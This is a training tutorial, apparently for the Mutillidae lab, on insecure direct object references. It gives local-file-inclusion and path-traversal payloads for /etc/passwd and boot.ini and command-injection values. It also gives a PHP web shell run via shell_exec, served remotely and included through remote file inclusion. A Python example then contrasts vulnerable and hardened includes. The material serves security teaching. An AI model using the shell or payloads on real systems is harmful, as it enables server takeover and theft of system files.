Insecure Direct Object References (IDOR)

Overview

An Insecure Direct Object Reference occurs when the application retrieves or acts on a resource using a client-supplied value that directly names that resource (a file name, a path, a URL, a database key) and does not check that the requesting user is authorized for it. Examples include passing the file name of a document to retrieve, redirecting to a URL that the browser supplied as a parameter value, and including a file whose path and name arrive in the request.

Discovery Methodology

For each parameter that identifies a resource, determine whether the value is the resource itself or an opaque token that is meaningless outside the application. For example, if the site expects an include-file name to be passed, this is a direct object reference. If instead the site expects an integer that the server later maps to the include file to display, the include itself is not likely to be vulnerable. Treat the integer with suspicion anyway: a sequential database key (an order or account number) is also a direct reference, and it is only safe when the server checks that the current user is allowed to see the object it maps to.

Exploitation

Based on the type of resource, submit other values to the server in order to gain access to, or load, content the user is not authorized for.

Example: Local File Inclusion

Note the page parameter in NOWASP URLs. This parameter is the include file to load within the main frame. Since the parameter loads whatever file is passed, attempt to pass a local file path or a remote file URI (the remote case only works when allow_url_include is enabled in PHP).

    http://[PATH TO MUTILLIDAE]/index.php?page=/etc/passwd

Example: Accessing system files

Step 1: Recon: Obtain a list of files

Possible Technique: Use command injection
Page: dns-lookup.php
Value (Windows): && dir /w
Value (Linux): && pwd && ls -l

Possible Technique: Use robots.txt
Possible Technique: Use directory browsing
Possible Technique: Use directory brute-forcing
Possible Technique: Guess

Step 2: Gaining Access: Retrieve system files

Page: source-viewer.php
Technique: Use an interception proxy such as Burp to change the value of the phpfile parameter. Use parent-directory segments (..) to climb out of the directory the application intends to confine you to.
Tool: Tamper Data, Paros, WebScarab, Burp
Field: phpfile
Value: <system file path>, for example
    ../../../boot.ini
    ..\..\..\WINDOWS\System32\drivers\etc\hosts
    ../../../etc/passwd
The number of .. segments needed depends on how deep the application directory sits; add more until the file resolves.

Example: Remote File Inclusion - Web Shell

Save this web shell in a file (simple-web-shell.php). It echoes the command it received, runs it on the server that included it, and prints the output inside a <pre> block.

    <?php
    echo "<pre>";
    // Echo the command back so the output is easy to read
    echo "shell_exec ".$_REQUEST["pCommand"]."\n\n";
    // Run the command and print whatever it wrote to stdout
    echo shell_exec($_REQUEST["pCommand"]);
    echo "</pre>";
    ?>

The web shell can be served using Python's built-in web server, which serves any content in the current directory on the port specified:

    python -m SimpleHTTPServer 8888

SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 8888.

Browse to the web shell through the page parameter, passing the command as the pCommand parameter. The host in the page value is fetched by the Mutillidae server, not by your browser, so 127.0.0.1:8888 only works when the Python server runs on the same machine as Mutillidae; otherwise use an address the server can reach.

    http://[PATH TO MUTILLIDAE]/index.php?page=http://127.0.0.1:8888/simple-web-shell.php&pCommand=cat+/etc/passwd

Videos

Introduction to Fuzzing Web Applications with Burp-Suite Intruder Tool
How to Exploit Local File Inclusion Vulnerability using Burp-Suite
ISSA 2013 Web Pen-testing Workshop - Part 6 - Local/Remote File Inclusion
How to Show Secret Page in Security Level 5
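The distinction the Discovery Methodology draws between a direct reference and a server-side token, and the reason a parent-directory (..) sequence climbs out of a jail in the source-viewer step, shown as an added Python example. This is not Mutillidae's code: it builds a throwaway directory tree (constructed data) with an app/pages include directory and a fake etc/passwd two levels above it, then runs the same traversal payload list you would feed to Burp Intruder against a vulnerable include, a hardened one that resolves before it checks, and an integer-token lookup. The function and file names are assumptions made for the example.

```python
"""Direct vs. indirect object references for an include-file parameter.

Added example, not Mutillidae's own code. Builds a scratch directory tree
(constructed data) so it runs offline: app/pages holds the includes, and
etc/passwd two levels up stands in for a system file the page should never
expose.
"""
import os
import tempfile
from pathlib import Path

ROOT = Path(tempfile.mkdtemp()).resolve()
APP = ROOT / "app" / "pages"
APP.mkdir(parents=True)
(APP / "home.php").write_text("<h1>home</h1>")
(APP / "login.php").write_text("<h1>login</h1>")
(ROOT / "etc").mkdir()
(ROOT / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")


def _read(path):
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def traversal_payloads(target, max_depth=3):
    """Enumerate ../ prefixes of increasing depth in front of a target path,
    the list you would hand to an intruder tool instead of guessing depth by
    hand. Depth is capped at 3 so the example stays inside the scratch tree."""
    rel = target.lstrip("/")
    return ["../" * depth + rel for depth in range(1, max_depth + 1)]


def naive_include(page):
    """Vulnerable lookup: the parameter *is* the resource. The prefix check is
    the jail that ../ walks out of, because it tests the unresolved string and
    APP + '/../../etc/passwd' still starts with APP."""
    path = os.path.join(str(APP), page)
    if not path.startswith(str(APP)):
        raise PermissionError(page)
    return _read(path)


def hardened_include(page):
    """Same direct reference, resolved before it is checked: realpath collapses
    .. and symlinks, and commonpath proves the result is still under APP."""
    real = os.path.realpath(os.path.join(str(APP), page))
    if os.path.commonpath([str(APP), real]) != str(APP):
        raise PermissionError(page)
    return _read(real)


PAGE_TOKENS = {1: "home.php", 2: "login.php"}   # constructed token map


def indirect_include(token):
    """Indirect reference: the client sends an integer that only the server can
    map to a file. There is no path to traverse, so tampering yields at most
    another entry in the map or a rejection."""
    try:
        name = PAGE_TOKENS[int(token)]
    except (ValueError, KeyError):
        raise PermissionError(token) from None
    return _read(APP / name)


def looks_like_passwd(body):
    """Success marker for a Unix passwd file, the kind of string a fuzzer
    greps responses for to separate hits from error pages."""
    return any(line.startswith("root:") and line.count(":") >= 6
               for line in body.splitlines())


def probe(include, payloads):
    """Run every payload through an include function and report which ones
    came back with content matching the target file."""
    hits = []
    for payload in payloads:
        try:
            body = include(payload)
        except OSError:  # PermissionError and FileNotFoundError both land here
            continue
        if looks_like_passwd(body):
            hits.append(payload)
    return hits


if __name__ == "__main__":
    payloads = traversal_payloads("etc/passwd")
    print("naive    :", probe(naive_include, payloads))
    print("hardened :", probe(hardened_include, payloads))
```

The naive version reports ../../etc/passwd as a hit while the hardened and token-mapped versions reject it; the check that matters is on the resolved path, not on the string the client sent.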